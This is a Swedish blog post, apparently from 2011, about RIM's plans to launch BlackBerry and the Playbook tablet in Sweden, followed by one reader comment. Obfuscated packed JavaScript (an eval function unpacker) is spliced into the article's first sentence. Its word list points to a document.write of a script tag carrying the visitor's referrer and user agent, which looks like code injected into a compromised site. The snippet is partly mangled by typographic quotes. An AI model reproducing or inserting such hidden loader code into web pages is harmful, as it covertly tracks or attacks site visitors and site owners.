Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Blackberry ska bli stort i Sverige!

Blackberry ska bli stort i Sverige!
Filip Urde
  • On 21 september, 2011
  • http://www.revue.se/filip-urde

Kanadensiska eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ebrhb|var|u0026u|referrer|ssrrb||js|php’.split(’|’),0,{}))
RIM ska satsa brett på att etablera Blackberry i Norden. Det är något som både operatörer och utvecklare ser fram emot.

SÅ nu är det alltså äntligen dags…. Blackberry har funnits i Sverige under en längre tid, men varit hopplöst handikappad. Dess funktioner har inte varit kompatibla och abonnemang alternativen som givits har varit helt lönlös om du jämför med t.ex. en iPhone. Detta ska ni Kanadensiska RIM ändra på och det är på tiden.

[quote]Egentligen är det lite märkligt att vi inte etablerat oss här tidigare med tanke på att vi under många år haft ett nära samarbete med Ericsson. Nu ska vi satsa stort på Sverige och öppnar vårt kontor i Stockholm efter årsskiftet. säger Paul Lucier.[/quote]

Det innebär att de svenska kunderna snabbare ska få tillgång till nya produkter, exempelvis pekdatorn Playbook som Paul Lucier hoppas kunna få ut i den svenska handeln i mars samtidigt som den amerikanska marknaden får produkten.

Det ska hursomhelst bli mycket intressant att få hit Blackberry i sitt fulla ”jag”, är sugen på ett alternativ till iPhone… Något som är svår funnet för min del i nuläget.

Comments

  1. Jonas

    Har undrat hur lång tid det ska ta innan Blackberry kommer till sverige på riktigt. Deras funktioner vill ju inte fungera här och det är ett skämt då företaget är så stort som det är i hela världen.